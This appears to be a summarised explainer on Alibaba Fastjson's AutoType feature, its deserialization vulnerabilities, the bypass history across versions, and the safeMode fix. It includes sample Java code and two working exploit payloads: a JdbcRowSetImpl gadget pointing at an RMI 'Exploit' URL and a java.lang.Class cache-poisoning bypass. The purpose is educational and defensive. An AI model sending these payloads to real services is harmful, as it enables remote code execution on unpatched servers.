Understanding Fastjson AutoType and Its Security Implications

Fastjson is a widely used JSON parsing library from Alibaba that converts between Java objects and JSON strings. Over the years, multiple security vulnerabilities have been discovered, many of which are tied to the AutoType feature introduced to preserve type information during serialization.

What is AutoType? AutoType records the original Java class of an object in the JSON payload (using the @type field) so that during deserialization the exact class can be reconstructed. This is useful when a field is declared as an interface or abstract class, as Fastjson would otherwise lose the concrete type.

Example code shows a Store class containing a Fruit interface. Without AutoType, deserialization yields a proxy object that cannot be cast back to the concrete Apple class, causing a ClassCastException . Enabling AutoType via SerializerFeature.WriteClassName adds the @type attribute, allowing successful reconstruction of the original Apple instance.

Security Risks The @type mechanism can be abused by attackers to instantiate arbitrary classes. By crafting a JSON payload with @type":"com.sun.rowset.JdbcRowSetImpl" and a malicious dataSourceName , remote code execution can be achieved because Fastjson will invoke the setter of the target class during deserialization.

Fastjson initially had AutoType enabled by default (pre‑v1.2.25), which made it vulnerable. Starting with v1.2.25, AutoType was disabled by default and a whitelist/blacklist (checkAutoType) was introduced. However, attackers found ways to bypass these checks by manipulating class name strings (e.g., adding leading L and trailing ; ), using double prefixes ( LL ) or array notation ( [ ), and exploiting the global class cache.

The article chronicles the arms race between Fastjson maintainers and attackers across versions v1.2.41, v1.2.42, v1.2.43, v1.2.44, v1.2.47, v1.2.48, and up to v1.2.72, describing specific bypass techniques and corresponding patches such as stricter prefix checks, cache disabling for java.lang.Class , and the introduction of safeMode in v1.2.68.

SafeMode can be enabled globally via ParserConfig.getGlobalInstance().setSafeMode(true) . When safeMode is on, any @type field is ignored and an exception is thrown, effectively disabling AutoType and preventing the described attacks.

The article concludes by recommending developers upgrade to the latest Fastjson version, enable safeMode if AutoType is not needed, and remain aware of the trade‑off between performance and security inherent in fast serialization libraries.

class Store {
    private String name;
    private Fruit fruit;
    public String getName() { return name; }
    public void setName(String name) { this.name = name; }
    public Fruit getFruit() { return fruit; }
    public void setFruit(Fruit fruit) { this.fruit = fruit; }
}

interface Fruit {}

class Apple implements Fruit {
    private BigDecimal price;
    // getters/setters omitted
}

Store store = new Store();
store.setName("Hollis");
Apple apple = new Apple();
apple.setPrice(new BigDecimal(0.5));
store.setFruit(apple);
String jsonString = JSON.toJSONString(store);
System.out.println("toJSONString : " + jsonString);

{"fruit":{"price":0.5},"name":"Hollis"}

String jsonString = JSON.toJSONString(store, SerializerFeature.WriteClassName);
System.out.println("toJSONString : " + jsonString);

{"@type":"com.hollis.lab.fastjson.test.Store","fruit":{"@type":"com.hollis.lab.fastjson.test.Apple","price":0.5},"name":"Hollis"}

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"}

ParserConfig.getGlobalInstance().setSafeMode(true);